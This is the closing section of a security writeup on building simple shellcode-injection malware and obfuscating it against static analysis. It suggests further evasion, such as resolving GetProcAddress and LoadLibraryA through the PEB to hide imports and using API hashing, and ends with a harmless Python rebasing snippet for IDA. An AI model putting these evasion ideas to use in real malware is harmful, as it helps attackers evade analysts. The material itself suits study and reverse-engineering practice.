This writeup went over the process of developing a simple malware program for shellcode injection and applying various obfuscation techniques to evade static analysis. Through the use of API obfuscation and string encryption, we demonstrated how these techniques can hinder reverse engineering efforts, making it more challenging (but not impossible!) to analyze the program using standard tools like IDA.

For further study, note that two interesting APIs are still in the IAT: GetProcAddress and LoadLibraryA. Their addresses can be calculated by traversing the PEB, which is outlined in my previous shellcoding in C writeup. One could resolve those two APIs that way and then use them to completely hide all the APIs from the IAT. In addition, further obfuscation techniques like API hashing could be leveraged to make it more difficult for malware analysts to understand what APIs or strings are being used throughout this program. API hashing was originally planned for this writeup but will likely be its own writeup due to time constraints.

On the reversing side of things, the dynamic analysis could have been more thorough, for example by watching the decryption take place in memory instead of relying on breakpoints on a specific API (what if the API is resolved some other way and so is never formally “called”?). Rebasing the addresses to match what’s in IDA would also have made it easier to follow the program’s execution flow.
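
Rebasing comes down to simple arithmetic: subtract the image base IDA used and add the base address the module was actually loaded at. Below is a minimal sketch, assuming IDA's image base is 0x140000000 (suggested by the name sub_140001000) and using a made-up runtime base purely for illustration.

```python
def rebase(ida_addr: int, ida_base: int, runtime_base: int) -> int:
    """Translate an address from IDA's view to the debugger's view."""
    return ida_addr - ida_base + runtime_base

IDA_BASE = 0x140000000          # assumed: image base used in the IDA database
RUNTIME_BASE = 0x7FF6A1230000   # hypothetical: read the real value from the debugger

# Where the XOR routine sub_140001000 would sit at runtime under these assumptions
print(hex(rebase(0x140001000, IDA_BASE, RUNTIME_BASE)))  # 0x7ff6a1231000
```

Alternatively, IDA can rebase the database itself (Edit > Segments > Rebase program) so that its addresses line up with the debugger.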